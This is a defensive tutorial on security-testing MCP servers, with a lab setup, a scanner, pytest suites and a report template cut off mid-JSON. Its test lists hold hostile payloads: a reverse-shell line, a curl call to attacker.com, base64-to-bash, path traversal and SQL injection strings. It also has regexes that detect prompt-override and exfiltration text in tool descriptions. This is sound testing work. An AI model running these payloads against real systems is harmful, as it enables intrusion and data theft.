MCP Security Testing: How to Test MCP Servers for Vulnerabilities
Advanced | 18 min read | Updated 2026-03-24
A defense-focused guide to security testing MCP server implementations -- methodology for MCP security assessments, scanning tools, common test cases for auth bypass, injection, traversal, and data leaks, with working test scripts and reporting templates.
Security testing of MCP servers requires a specialized methodology because MCP sits at the intersection of traditional application security (HTTP, authentication, input validation) and AI-specific risks (prompt injection, token amplification, tool description poisoning). Standard web application scanners miss MCP-specific vulnerabilities, and AI security tools typically focus on the LLM rather than the tool infrastructure.
MCP Security Assessment Methodology
Phase Overview
┌───────────────────────────────────────────────────────────────┐
│ MCP Security Assessment Phases │
├────────────┬──────────────────────────────────────────────────┤
│ Phase 1 │ Reconnaissance and Discovery │
│ │ - Identify all MCP servers in scope │
│ │ - Enumerate tools, transports, and capabilities │
│ │ - Map trust boundaries and data flows │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 2 │ Authentication and Authorization Testing │
│ │ - Test for unauthenticated access │
│ │ - Test token/credential handling │
│ │ - Verify per-tool authorization scopes │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 3 │ Input Validation Testing │
│ │ - Command injection in all parameters │
│ │ - Path traversal in file operations │
│ │ - SQL injection in database tools │
│ │ - Tool description poisoning analysis │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 4 │ Session and State Testing │
│ │ - Cross-session data isolation │
│ │ - Session fixation and hijacking │
│ │ - State cleanup on disconnect │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 5 │ Resource and Cost Testing │
│ │ - Token amplification (sampling abuse) │
│ │ - Output size abuse │
│ │ - Rate limiting effectiveness │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 6 │ Supply Chain and Configuration Review │
│ │ - Package integrity verification │
│ │ - SDK version validation │
│ │ - Network exposure assessment │
│ │ - Container/sandbox configuration review │
├────────────┼──────────────────────────────────────────────────┤
│ Phase 7 │ Reporting and Remediation │
│ │ - Findings documentation │
│ │ - Risk scoring and prioritization │
│ │ - Remediation recommendations │
│ │ - Retest verification │
└────────────┴──────────────────────────────────────────────────┘
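To make the Phase 3 path traversal item concrete, here is a minimal sketch of the server-side containment check that the traversal payloads later in this guide try to defeat. The function name `resolve_within` and the idea of a single workspace root are assumptions made for illustration; they are not part of any MCP SDK.

```python
from pathlib import Path


def resolve_within(base_dir: str, user_path: str) -> Path:
    """Resolve user_path under base_dir, rejecting anything that escapes it."""
    if "\x00" in user_path:
        raise ValueError("null byte in path")
    base = Path(base_dir).resolve()
    # Joining with an absolute user_path discards base, so the containment
    # check below also covers payloads such as "/etc/passwd".
    candidate = (base / user_path).resolve()
    if not candidate.is_relative_to(base):  # requires Python 3.9+
        raise ValueError(f"path escapes workspace: {user_path!r}")
    return candidate
```

A server that routes every file parameter through a check of this kind should return an error, not file contents, for the `dot_dot_slash`, `absolute`, and `null_byte` payloads. Percent-encoded payloads are treated as literal file names here because the function never URL-decodes its input.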
Setting Up a Safe Test Environment
Docker-Based Test Lab
# docker-compose.test.yaml
# Isolated test environment for MCP security testing
version: "3.8"

services:
  # Target MCP server (the server being tested)
  target-mcp-server:
    build:
      context: ./target-server
    container_name: mcp-test-target
    ports:
      # Bind to loopback only so the test target is not reachable from the LAN
      - "127.0.0.1:8080:8080"
    environment:
      - MCP_AUTH_ENABLED=true
      - MCP_AUTH_TOKEN=test-token-for-testing-only
      - MCP_WORKSPACE=/workspace
    volumes:
      - test-workspace:/workspace
    networks:
      - test-network

  # MCP security scanner
  mcp-scanner:
    build:
      context: ./scanner
      dockerfile: Dockerfile.scanner
    container_name: mcp-scanner
    environment:
      - TARGET_URL=http://target-mcp-server:8080
      - TEST_TOKEN=test-token-for-testing-only
    volumes:
      - ./reports:/reports
    networks:
      - test-network
    depends_on:
      - target-mcp-server

  # Network traffic capture
  tcpdump:
    image: nicolaka/netshoot
    container_name: mcp-traffic-capture
    # Share the target's network namespace. A separate container on the bridge
    # would only see its own traffic, not the scanner-to-target requests.
    network_mode: "service:target-mcp-server"
    command: tcpdump -i any -w /captures/mcp-traffic.pcap port 8080
    volumes:
      - ./captures:/captures
    cap_add:
      - NET_RAW
      - NET_ADMIN
    depends_on:
      - target-mcp-server

volumes:
  test-workspace:

networks:
  test-network:
    driver: bridge

#!/bin/bash
# setup-test-lab.sh -- Set up the MCP security testing environment
set -euo pipefail
echo "[*] Creating test workspace with sample files..."
mkdir -p target-server/workspace
echo "public content" > target-server/workspace/public.txt
echo "SECRET_API_KEY=sk-test-12345" > target-server/workspace/.env
mkdir -p target-server/workspace/subdir
echo "nested file" > target-server/workspace/subdir/nested.txt
echo "[*] Creating reports directory..."
mkdir -p reports captures
echo "[*] Starting test environment..."
docker compose -f docker-compose.test.yaml up -d
echo "[*] Waiting for services..."
sleep 5
echo "[*] Verifying test environment..."
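# -f makes curl fail on HTTP errors; abort instead of reporting a broken lab as ready
if curl -fsS http://localhost:8080/health; then
  echo " -- MCP server healthy"
else
  echo "[-] MCP server health check failed" >&2
  exit 1
fi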
echo "[+] Test environment ready."
echo " Target: http://localhost:8080"
echo " Reports: ./reports/"
echo " Captures: ./captures/"

MCP Security Scanner
"""
MCP Security Scanner
Comprehensive security testing tool for MCP server implementations.
"""
import asyncio
import aiohttp
import json
import time
import logging
from dataclasses import dataclass, field
from typing import Optional
from datetime import datetime
from enum import Enum

logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("mcp.scanner")


class Severity(Enum):
    CRITICAL = "critical"
    HIGH = "high"
    MEDIUM = "medium"
    LOW = "low"
    INFO = "info"


@dataclass
class Finding:
    """A security finding from the scan."""
    title: str
    severity: Severity
    category: str
    description: str
    evidence: str = ""
    remediation: str = ""
    references: list[str] = field(default_factory=list)
    cvss_score: float = 0.0


@dataclass
class ScanResult:
    """Complete scan results."""
    target_url: str
    scan_start: datetime
    scan_end: Optional[datetime] = None
    findings: list[Finding] = field(default_factory=list)
    tools_discovered: list[dict] = field(default_factory=list)
    server_info: dict = field(default_factory=dict)


class MCPSecurityScanner:
    """
    Security scanner for MCP servers.
    Tests for common vulnerabilities identified in MCP security research.
    """

    def __init__(self, target_url: str, auth_token: Optional[str] = None):
        self.target_url = target_url.rstrip("/")
        self.auth_token = auth_token
        self.result = ScanResult(
            target_url=target_url,
            scan_start=datetime.utcnow(),
        )

    def _headers(self) -> dict:
        headers = {"Content-Type": "application/json"}
        if self.auth_token:
            headers["Authorization"] = f"Bearer {self.auth_token}"
        return headers

    async def _jsonrpc_call(self, session: aiohttp.ClientSession,
                            method: str, params: Optional[dict] = None,
                            msg_id: int = 1) -> dict:
        """Send a JSON-RPC request to the MCP server."""
        payload = {
            "jsonrpc": "2.0",
            "method": method,
            "id": msg_id,
        }
        if params:
            payload["params"] = params
        # Assumes the server returns the JSON-RPC response in the POST body.
        # Servers that answer over a separate SSE stream need a stream reader.
        async with session.post(
            f"{self.target_url}/messages/",
            json=payload,
            headers=self._headers(),
        ) as resp:
            return await resp.json()

    async def run_full_scan(self):
        """Run all security test phases."""
        async with aiohttp.ClientSession() as session:
            logger.info("Starting MCP security scan: %s", self.target_url)
            await self.phase1_discovery(session)
            await self.phase2_authentication(session)
            await self.phase3_input_validation(session)
            await self.phase4_session_isolation(session)
            await self.phase5_resource_abuse(session)
        self.result.scan_end = datetime.utcnow()
        logger.info(
            "Scan complete. Findings: %d (Critical: %d, High: %d)",
            len(self.result.findings),
            sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
            sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
        )
        return self.result

    # === Phase 1: Discovery ===
    async def phase1_discovery(self, session: aiohttp.ClientSession):
        """Enumerate MCP server capabilities and tools."""
        logger.info("Phase 1: Discovery")
        # Try to initialize
        try:
            init_result = await self._jsonrpc_call(session, "initialize", {
                "protocolVersion": "2024-11-05",
                "clientInfo": {"name": "security-scanner", "version": "1.0"},
                "capabilities": {},
            })
            self.result.server_info = init_result.get("result", {})
            logger.info("Server info: %s", self.result.server_info.get("serverInfo", {}))
        except Exception as e:
            logger.warning("Initialize failed: %s", e)
        # List tools
        try:
            tools_result = await self._jsonrpc_call(session, "tools/list")
            tools = tools_result.get("result", {}).get("tools", [])
            self.result.tools_discovered = tools
            logger.info("Discovered %d tools", len(tools))
            # Analyze tool descriptions for injection patterns
            for tool in tools:
                self._analyze_tool_description(tool)
        except Exception as e:
            logger.warning("Tool enumeration failed: %s", e)

    def _analyze_tool_description(self, tool: dict):
        """Check tool description for injection patterns."""
        import re
        desc = tool.get("description", "")
        name = tool.get("name", "unknown")
        suspicious_patterns = [
            (r"(?i)\byou must\b", "Imperative instruction in tool description"),
            (r"(?i)\balways\b.*\btool\b", "Unconditional tool directive"),
            (r"https?://", "External URL in tool description"),
            (r"(?i)\bignore\b.*\bprevious\b", "Prompt override pattern"),
            (r"(?i)\bsend\b.*\bto\b.*https?://", "Data exfiltration instruction"),
        ]
        for pattern, desc_text in suspicious_patterns:
            if re.search(pattern, desc):
                self.result.findings.append(Finding(
                    title=f"Suspicious tool description: {name}",
                    severity=Severity.HIGH,
                    category="tool_description_poisoning",
                    description=desc_text,
                    evidence=f"Tool '{name}' description: {desc[:300]}",
                    remediation="Review and sanitize tool descriptions. Remove imperative instructions and external URLs.",
                    references=["OWASP ASI-03"],
                ))

    # === Phase 2: Authentication ===
    async def phase2_authentication(self, session: aiohttp.ClientSession):
        """Test authentication controls."""
        logger.info("Phase 2: Authentication")
        # Test unauthenticated access
        unauth_headers = {"Content-Type": "application/json"}
        try:
            async with session.post(
                f"{self.target_url}/messages/",
                json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
                headers=unauth_headers,
            ) as resp:
                if resp.status == 200:
                    body = await resp.json()
                    if "result" in body:
                        self.result.findings.append(Finding(
                            title="Unauthenticated access to MCP server",
                            severity=Severity.CRITICAL,
                            category="authentication",
                            description=(
                                "MCP server accepts tool listing without authentication. "
                                "Any network-reachable client can enumerate and call tools."
                            ),
                            evidence="HTTP 200 response to unauthenticated tools/list",
                            remediation="Implement Bearer token or mTLS authentication.",
                            references=["VulnerableMCP", "MCP Auth Gaps"],
                            cvss_score=9.1,
                        ))
                elif resp.status in (401, 403):
                    logger.info("Authentication required (good): HTTP %d", resp.status)
        except Exception as e:
            logger.warning("Auth test failed: %s", e)
        # Test with invalid token
        bad_headers = {
            "Content-Type": "application/json",
            "Authorization": "Bearer invalid-token-12345",
        }
        try:
            async with session.post(
                f"{self.target_url}/messages/",
                json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
                headers=bad_headers,
            ) as resp:
                if resp.status == 200:
                    # A JSON-RPC error can also arrive with HTTP 200, so only
                    # a body carrying "result" counts as a bypass.
                    body = await resp.json()
                    if "result" in body:
                        self.result.findings.append(Finding(
                            title="Authentication bypass with invalid token",
                            severity=Severity.CRITICAL,
                            category="authentication",
                            description="Server accepts invalid authentication token.",
                            evidence="HTTP 200 with token 'invalid-token-12345'",
                            remediation="Verify token validation logic.",
                            cvss_score=9.8,
                        ))
        except Exception as e:
            logger.warning("Invalid token test failed: %s", e)

    # === Phase 3: Input Validation ===
    async def phase3_input_validation(self, session: aiohttp.ClientSession):
        """Test input validation across all tools."""
        logger.info("Phase 3: Input Validation")
        for tool in self.result.tools_discovered:
            tool_name = tool.get("name", "")
            schema = tool.get("inputSchema", {})
            properties = schema.get("properties", {})
            for param_name, param_schema in properties.items():
                param_type = param_schema.get("type", "string")
                if param_type == "string":
                    # Test command injection
                    await self._test_command_injection(
                        session, tool_name, param_name
                    )
                    # Test path traversal (if parameter name suggests file path)
                    if any(s in param_name.lower() for s in ["path", "file", "dir", "folder"]):
                        await self._test_path_traversal(
                            session, tool_name, param_name
                        )

    async def _test_command_injection(self, session: aiohttp.ClientSession,
                                      tool_name: str, param_name: str):
        """Test a parameter for command injection."""
        payloads = [
            ("basic_semicolon", "test; id"),
            ("pipe", "test | cat /etc/passwd"),
            ("backtick", "test `id`"),
            ("dollar_paren", "test $(whoami)"),
            ("newline", "test\nid"),
            ("and_chain", "test && curl attacker.com"),
        ]
        for payload_name, payload in payloads:
            try:
                result = await self._jsonrpc_call(session, "tools/call", {
                    "name": tool_name,
                    "arguments": {param_name: payload},
                })
                # Check if the injection produced output indicating execution
                result_text = json.dumps(result)
                injection_indicators = ["uid=", "root:", "www-data", "nobody"]
                for indicator in injection_indicators:
                    if indicator in result_text:
                        self.result.findings.append(Finding(
                            title=f"Command injection in {tool_name}.{param_name}",
                            severity=Severity.CRITICAL,
                            category="command_injection",
                            description=(
                                f"Parameter '{param_name}' of tool '{tool_name}' "
                                f"is vulnerable to command injection via {payload_name}."
                            ),
                            evidence=f"Payload: {payload}\nResponse: {result_text[:500]}",
                            remediation=(
                                "Use parameterized command execution (shell=False). "
                                "Validate input against allowlist patterns."
                            ),
                            references=["CVE-2025-6514", "OWASP Command Injection"],
                            cvss_score=9.6,
                        ))
                        break
            except Exception:
                continue

    async def _test_path_traversal(self, session: aiohttp.ClientSession,
                                   tool_name: str, param_name: str):
        """Test a parameter for path traversal."""
        payloads = [
            ("dot_dot_slash", "../../../etc/passwd"),
            ("absolute", "/etc/passwd"),
            ("encoded", "..%2f..%2f..%2fetc%2fpasswd"),
            ("double_encoded", "..%252f..%252f..%252fetc%252fpasswd"),
            ("null_byte", "valid.txt\x00../../../etc/passwd"),
        ]
        for payload_name, payload in payloads:
            try:
                result = await self._jsonrpc_call(session, "tools/call", {
                    "name": tool_name,
                    "arguments": {param_name: payload},
                })
                result_text = json.dumps(result)
                passwd_indicators = ["root:x:", "root:*:", "daemon:", "nobody:"]
                for indicator in passwd_indicators:
                    if indicator in result_text:
                        self.result.findings.append(Finding(
                            title=f"Path traversal in {tool_name}.{param_name}",
                            severity=Severity.CRITICAL,
                            category="path_traversal",
                            description=(
                                f"Parameter '{param_name}' of tool '{tool_name}' "
                                f"is vulnerable to path traversal via {payload_name}."
                            ),
                            evidence=f"Payload: {payload}\nResponse contains: {indicator}",
                            remediation=(
                                "Resolve and canonicalize paths before access. "
                                "Verify resolved path is within allowed base directory."
                            ),
                            references=["CVE-2025-68145", "CWE-22"],
                            cvss_score=8.6,
                        ))
                        break
            except Exception:
                continue

    # === Phase 4: Session Isolation ===
    async def phase4_session_isolation(self, session: aiohttp.ClientSession):
        """Identify candidate tools for cross-session isolation testing."""
        logger.info("Phase 4: Session Isolation")
        # Find a tool pair that stores and retrieves data
        write_tools = [t for t in self.result.tools_discovered
                       if any(s in t.get("name", "").lower()
                              for s in ["save", "write", "remember", "store", "set"])]
        read_tools = [t for t in self.result.tools_discovered
                      if any(s in t.get("name", "").lower()
                             for s in ["read", "recall", "get", "retrieve", "load"])]
        if not write_tools or not read_tools:
            logger.info("No write/read tool pair found for isolation testing")
            return
        logger.info("Testing session isolation with %s / %s",
                    write_tools[0]["name"], read_tools[0]["name"])
        # Note: a full isolation test needs two separate client sessions
        # (for example two SSE connections). This phase only identifies the
        # candidate tools; it does not perform the cross-session check.

    # === Phase 5: Resource Abuse ===
    async def phase5_resource_abuse(self, session: aiohttp.ClientSession):
        """Test resource limits and rate limiting."""
        logger.info("Phase 5: Resource Abuse")
        # Test rate limiting: count only requests the server actually accepted
        total_requests = 50
        accepted = 0
        for i in range(total_requests):
            try:
                async with session.post(
                    f"{self.target_url}/messages/",
                    json={"jsonrpc": "2.0", "method": "tools/list", "id": i},
                    headers=self._headers(),
                ) as resp:
                    if resp.status == 429:
                        logger.info("Rate limited at request %d (good)", i)
                        break
                    if resp.status == 200:
                        accepted += 1
            except Exception:
                break
        if accepted >= total_requests:
            self.result.findings.append(Finding(
                title="No rate limiting on MCP tool calls",
                severity=Severity.HIGH,
                category="rate_limiting",
                description=(
                    f"Server accepted {accepted} rapid requests without rate limiting. "
                    "This enables denial-of-wallet and brute force attacks."
                ),
                evidence=f"Sent {accepted} requests in burst, all returned 200",
                remediation="Implement rate limiting per client IP and per session.",
                references=["MCP Denial of Wallet"],
            ))
        # Test output size limits
        for tool in self.result.tools_discovered:
            if "query" in tool.get("name", "").lower():
                try:
                    result = await self._jsonrpc_call(session, "tools/call", {
                        "name": tool["name"],
                        "arguments": {"query": "SELECT * FROM large_table LIMIT 1000000"},
                    })
                    result_size = len(json.dumps(result))
                    if result_size > 1_000_000:
                        self.result.findings.append(Finding(
                            title=f"No output size limit on {tool['name']}",
                            severity=Severity.MEDIUM,
                            category="resource_abuse",
                            description=f"Tool returned {result_size} bytes without truncation.",
                            remediation="Implement output size limits on all tools.",
                        ))
                except Exception:
                    continue

    def generate_report(self, format: str = "json") -> str:
        """Generate the security assessment report."""
        if format == "json":
            return json.dumps({
                "target": self.result.target_url,
                "scan_start": self.result.scan_start.isoformat(),
                "scan_end": self.result.scan_end.isoformat() if self.result.scan_end else None,
                "summary": {
                    "total_findings": len(self.result.findings),
                    "critical": sum(1 for f in self.result.findings if f.severity == Severity.CRITICAL),
                    "high": sum(1 for f in self.result.findings if f.severity == Severity.HIGH),
                    "medium": sum(1 for f in self.result.findings if f.severity == Severity.MEDIUM),
                    "low": sum(1 for f in self.result.findings if f.severity == Severity.LOW),
                    "info": sum(1 for f in self.result.findings if f.severity == Severity.INFO),
                    "tools_discovered": len(self.result.tools_discovered),
                },
                "server_info": self.result.server_info,
                "findings": [
                    {
                        "title": f.title,
                        "severity": f.severity.value,
                        "category": f.category,
                        "description": f.description,
                        "evidence": f.evidence,
                        "remediation": f.remediation,
                        "references": f.references,
                        "cvss_score": f.cvss_score,
                    }
                    for f in sorted(self.result.findings,
                                    key=lambda x: x.cvss_score, reverse=True)
                ],
            }, indent=2)
        return ""


# CLI runner
async def main():
    import argparse
    import os
    parser = argparse.ArgumentParser(description="MCP Security Scanner")
    parser.add_argument("target", help="MCP server URL")
    parser.add_argument("--token", help="Authentication token")
    parser.add_argument("--output", default="reports/mcp-scan.json", help="Output file")
    args = parser.parse_args()
    scanner = MCPSecurityScanner(args.target, auth_token=args.token)
    await scanner.run_full_scan()
    report = scanner.generate_report()
    # Create the output directory if needed so the default path works on a fresh checkout
    os.makedirs(os.path.dirname(args.output) or ".", exist_ok=True)
    with open(args.output, "w") as f:
        f.write(report)
    print(f"\nReport written to: {args.output}")
    print(f"Findings: {len(scanner.result.findings)}")


if __name__ == "__main__":
    asyncio.run(main())

Individual Test Scripts
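Phase 4 of the scanner only locates a candidate write/read tool pair, so the cross-session check itself is worth sketching separately. The version below is a hedged outline, not a drop-in test: the `ToolCall` signature, the tool names `remember` and `recall`, and the in-memory fake session are all assumptions made so the logic can run without a live server. Against a real target, each `ToolCall` would wrap its own authenticated client connection.

```python
import asyncio
import secrets
from typing import Awaitable, Callable

# A ToolCall sends one tools/call request on a specific client session and
# returns the response as text. This signature is an assumption of the sketch.
ToolCall = Callable[[str, dict], Awaitable[str]]


async def leaks_across_sessions(
    call_a: ToolCall,
    call_b: ToolCall,
    write_tool: str,
    write_arg: str,
    read_tool: str,
    read_args: dict,
) -> bool:
    """Write a unique canary via session A; report whether session B can read it."""
    canary = f"canary-{secrets.token_hex(8)}"
    await call_a(write_tool, {write_arg: canary})
    observed = await call_b(read_tool, read_args)
    return canary in observed


def make_fake_session(store: dict) -> ToolCall:
    """In-memory stand-in for a real MCP session, used only to exercise the check."""
    async def call(tool: str, arguments: dict) -> str:
        if tool == "remember":  # hypothetical write tool
            store["note"] = arguments["text"]
            return "ok"
        return store.get("note", "")  # hypothetical read tool
    return call


if __name__ == "__main__":
    shared: dict = {}
    leaky = asyncio.run(leaks_across_sessions(
        make_fake_session(shared), make_fake_session(shared),
        "remember", "text", "recall", {},
    ))
    isolated = asyncio.run(leaks_across_sessions(
        make_fake_session({}), make_fake_session({}),
        "remember", "text", "recall", {},
    ))
    print(f"shared store leaks: {leaky}, isolated store leaks: {isolated}")
```

Using a random canary per run avoids false positives from data left behind by an earlier test, which also makes the same helper usable for the "state cleanup on disconnect" check.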
Authentication Bypass Tests
"""
mcp_test_auth.py -- Authentication bypass test cases for MCP servers.
"""
import os
from typing import Optional

import aiohttp
import pytest

# The runner script exports TARGET; fall back to the local test lab.
TARGET = os.environ.get("TARGET", "http://localhost:8080")


async def tools_list_status(authorization: Optional[str]) -> int:
    """POST tools/list with an optional Authorization header; return the HTTP status."""
    headers = {"Content-Type": "application/json"}
    if authorization is not None:
        headers["Authorization"] = authorization
    async with aiohttp.ClientSession() as session:
        async with session.post(
            f"{TARGET}/messages/",
            json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
            headers=headers,
        ) as resp:
            return resp.status


class TestMCPAuthentication:
    """Test authentication controls on MCP servers."""

    @pytest.mark.asyncio
    async def test_no_token_rejected(self):
        """Request without token must be rejected."""
        status = await tools_list_status(None)
        assert status in (401, 403), \
            f"Unauthenticated request accepted (HTTP {status})"

    @pytest.mark.asyncio
    async def test_invalid_token_rejected(self):
        """Request with invalid token must be rejected."""
        status = await tools_list_status("Bearer invalid-token")
        assert status in (401, 403), \
            f"Invalid token accepted (HTTP {status})"

    @pytest.mark.asyncio
    async def test_expired_token_rejected(self):
        """Request with expired token must be rejected."""
        # Placeholder value: replace with a token the target really issued and
        # that has since expired, otherwise this repeats the invalid-token test.
        status = await tools_list_status("Bearer expired-test-token-2025")
        assert status in (401, 403), \
            f"Expired token accepted (HTTP {status})"

    @pytest.mark.asyncio
    async def test_empty_bearer_rejected(self):
        """Empty bearer token must be rejected."""
        status = await tools_list_status("Bearer ")
        assert status in (401, 403), \
            f"Empty bearer token accepted (HTTP {status})"

    @pytest.mark.asyncio
    async def test_sql_injection_in_token(self):
        """SQL injection in token field must be rejected safely."""
        injection_tokens = [
            "' OR '1'='1",
            "admin'--",
            "\" OR \"1\"=\"1",
            "1; DROP TABLE tokens;",
        ]
        for token in injection_tokens:
            status = await tools_list_status(f"Bearer {token}")
            assert status in (401, 403), \
                f"SQL injection token accepted: {token}"

Command Injection Tests
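The payloads in this section only reach a shell when the server builds a command string from tool arguments. As a point of reference, here is a minimal sketch of a handler that should pass these tests. The tool name `grep_workspace`, the allowlist pattern, and the choice of `grep` are illustrative assumptions, not taken from any particular MCP server.

```python
import re
import subprocess

# Allowlist: letters, digits, space, and a few safe punctuation characters.
_SAFE_PATTERN = re.compile(r"[A-Za-z0-9_.\- ]{1,64}")


def grep_workspace(pattern: str, workspace: str = ".") -> str:
    """Search the workspace for a literal string without invoking a shell."""
    if not _SAFE_PATTERN.fullmatch(pattern):
        raise ValueError("pattern contains characters outside the allowlist")
    # An argv list with shell=False (the default) means metacharacters are
    # never parsed by a shell. "--" stops grep from reading the pattern as
    # an option, and -F treats it as a fixed string rather than a regex.
    completed = subprocess.run(
        ["grep", "-rF", "--", pattern, workspace],
        capture_output=True,
        text=True,
        timeout=10,
        check=False,
    )
    return completed.stdout[:10_000]  # cap output size
```

The allowlist and the argv-style call are two independent layers: either one alone blocks the `semicolon`, `backtick`, and `dollar_paren` payloads, and keeping both means a later change to one does not silently reopen the hole.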
"""
mcp_test_injection.py -- Command injection test cases.
"""
import json
import os

import aiohttp
import pytest
import pytest_asyncio

INJECTION_PAYLOADS = {
    "semicolon": "test; id",
    "pipe_to_shell": "test | bash",
    "backtick": "`id`",
    "dollar_paren": "$(whoami)",
    "dollar_brace": "${IFS}cat${IFS}/etc/passwd",
    "newline": "test\nid",
    "carriage_return": "test\r\nid",
    "ampersand": "test && id",
    "or_chain": "test || id",
    "subshell": "(id)",
    "redirect": "test > /tmp/pwned",
    "reverse_shell": "test; bash -i >& /dev/tcp/127.0.0.1/4444 0>&1",
    "python_exec": "test; python3 -c 'import os;os.system(\"id\")'",
    "null_byte": "test\x00; id",
    "base64_decode": "test; echo aWQ= | base64 -d | bash",
}


class TestCommandInjection:
    """Test all tool parameters for command injection."""
    # The runner script exports TARGET and TOKEN; fall back to the local test lab.
    TARGET = os.environ.get("TARGET", "http://localhost:8080")
    TOKEN = os.environ.get("TOKEN", "test-token-for-testing-only")

    # Async fixtures need pytest_asyncio.fixture; a plain pytest.fixture on an
    # async function is not awaited in pytest-asyncio's default strict mode.
    @pytest_asyncio.fixture
    async def session(self):
        async with aiohttp.ClientSession() as s:
            yield s

    @pytest_asyncio.fixture
    async def tools(self, session):
        """Discover available tools."""
        async with session.post(
            f"{self.TARGET}/messages/",
            json={"jsonrpc": "2.0", "method": "tools/list", "id": 1},
            headers={
                "Content-Type": "application/json",
                "Authorization": f"Bearer {self.TOKEN}",
            },
        ) as resp:
            data = await resp.json()
            return data.get("result", {}).get("tools", [])

    @pytest.mark.asyncio
    @pytest.mark.parametrize("payload_name,payload", list(INJECTION_PAYLOADS.items()))
    async def test_injection_blocked(self, session, tools, payload_name, payload):
        """Verify injection payloads are blocked for all string parameters."""
        for tool in tools:
            tool_name = tool["name"]
            properties = tool.get("inputSchema", {}).get("properties", {})
            for param_name, param_schema in properties.items():
                # Only string parameters can carry these payloads
                if param_schema.get("type", "string") != "string":
                    continue
                async with session.post(
                    f"{self.TARGET}/messages/",
                    json={
                        "jsonrpc": "2.0",
                        "method": "tools/call",
                        "id": 1,
                        "params": {
                            "name": tool_name,
                            "arguments": {param_name: payload},
                        },
                    },
                    headers={
                        "Content-Type": "application/json",
                        "Authorization": f"Bearer {self.TOKEN}",
                    },
                ) as resp:
                    data = await resp.json()
                    result_text = json.dumps(data).lower()
                    # These strings suggest the payload reached a shell or the
                    # filesystem; treat any hit as a lead to confirm manually.
                    dangerous_outputs = [
                        "uid=", "root:", "www-data", "nobody:",
                        "/bin/bash", "/bin/sh", "permission denied",
                    ]
                    for indicator in dangerous_outputs:
                        assert indicator not in result_text, (
                            f"COMMAND INJECTION: {tool_name}.{param_name} "
                            f"with payload '{payload_name}' produced output "
                            f"containing '{indicator}'"
                        )

Running the Tests
#!/bin/bash
# run-mcp-security-tests.sh -- Execute all MCP security tests
set -euo pipefail
TARGET="${1:-http://localhost:8080}"
TOKEN="${2:-test-token-for-testing-only}"
REPORT_DIR="./reports/$(date +%Y%m%d_%H%M%S)"
mkdir -p "$REPORT_DIR"
echo "=== MCP Security Test Suite ==="
echo "Target: $TARGET"
echo "Report: $REPORT_DIR"
echo ""
# Run Python scanner
echo "[*] Running MCP Security Scanner..."
python3 mcp_scanner.py "$TARGET" \
--token "$TOKEN" \
--output "$REPORT_DIR/scanner-report.json"
# Run pytest test suites
echo ""
echo "[*] Running Authentication Tests..."
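# Failing security tests are an expected outcome; "|| echo" keeps set -e and
# pipefail from aborting the script before the summary is generated.
TARGET="$TARGET" TOKEN="$TOKEN" \
  pytest mcp_test_auth.py -v --tb=short \
  --junitxml="$REPORT_DIR/auth-tests.xml" 2>&1 | tee "$REPORT_DIR/auth-tests.log" \
  || echo "[!] Authentication tests reported failures (see auth-tests.log)"
echo ""
echo "[*] Running Injection Tests..."
TARGET="$TARGET" TOKEN="$TOKEN" \
  pytest mcp_test_injection.py -v --tb=short \
  --junitxml="$REPORT_DIR/injection-tests.xml" 2>&1 | tee "$REPORT_DIR/injection-tests.log" \
  || echo "[!] Injection tests reported failures (see injection-tests.log)"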
echo ""
echo "[*] Generating summary report..."
python3 << PYEOF
import json, os

report_dir = "$REPORT_DIR"
findings = []

# Collect scanner findings
scanner_report = os.path.join(report_dir, "scanner-report.json")
if os.path.exists(scanner_report):
    with open(scanner_report) as f:
        data = json.load(f)
    findings.extend(data.get("findings", []))

print(f"\n{'='*60}")
print(f" MCP Security Assessment Summary")
print(f"{'='*60}")
print(f" Target: $TARGET")
print(f" Total findings: {len(findings)}")
for severity in ["critical", "high", "medium", "low"]:
    count = sum(1 for f in findings if f.get("severity") == severity)
    if count > 0:
        print(f" {severity.upper()}: {count}")
if findings:
    print(f"\n Top findings:")
    for f in sorted(findings, key=lambda x: x.get("cvss_score", 0), reverse=True)[:5]:
        print(f" [{f['severity'].upper()}] {f['title']}")
print(f"\n Full report: {report_dir}/")
print(f"{'='*60}")
PYEOF

Reporting Template
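The scanner's JSON report uses a flatter finding shape than the report template in this section, so some mapping is needed before findings can be pasted in. The helper below is a minimal sketch of that mapping. The function name `to_template_findings` is hypothetical, and fields the scanner does not produce (`cvss_vector`, `impact`, `steps_to_reproduce`, the long-term remediation) are deliberately left for the assessor to complete.

```python
import json


def to_template_findings(scanner_findings: list[dict]) -> list[dict]:
    """Map scanner findings onto the finding shape used by the report template."""
    ordered = sorted(
        scanner_findings, key=lambda f: f.get("cvss_score", 0.0), reverse=True
    )
    return [
        {
            "id": f"MCP-FINDING-{index:03d}",
            "title": f["title"],
            "severity": f["severity"].upper(),
            "cvss_score": f.get("cvss_score", 0.0),
            "category": f.get("category", ""),
            "status": "OPEN",  # new findings start open; update after retest
            "description": f.get("description", ""),
            "evidence": f.get("evidence", ""),
            # The scanner emits one remediation string; the long-term fix is
            # left blank for the assessor.
            "remediation": {
                "short_term": f.get("remediation", ""),
                "long_term": "",
            },
            "references": f.get("references", []),
        }
        for index, f in enumerate(ordered, start=1)
    ]


if __name__ == "__main__":
    sample = [
        {"title": "No rate limiting", "severity": "high", "cvss_score": 0.0},
        {"title": "Unauthenticated access", "severity": "critical", "cvss_score": 9.1},
    ]
    print(json.dumps(to_template_findings(sample), indent=2))
```

Sorting before numbering means `MCP-FINDING-001` is always the highest-scored finding, which matches the order the scanner already uses in its own output.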
{
  "report_metadata": {
    "title": "MCP Server Security Assessment Report",
    "version": "1.0",
    "date": "2026-03-24",
    "assessor": "Security Team",
    "classification": "CONFIDENTIAL"
  },
  "executive_summary": {
    "scope": "Security assessment of [MCP Server Name] version [X.Y.Z]",
    "methodology": "Based on VulnerableMCP project methodology and OWASP ASI guidelines",
    "overall_risk": "HIGH|MEDIUM|LOW",
    "key_findings": [
      "Finding summary 1",
      "Finding summary 2"
    ],
    "recommendation": "Address all CRITICAL and HIGH findings before production deployment"
  },
  "scope": {
    "target_server": "Server name and version",
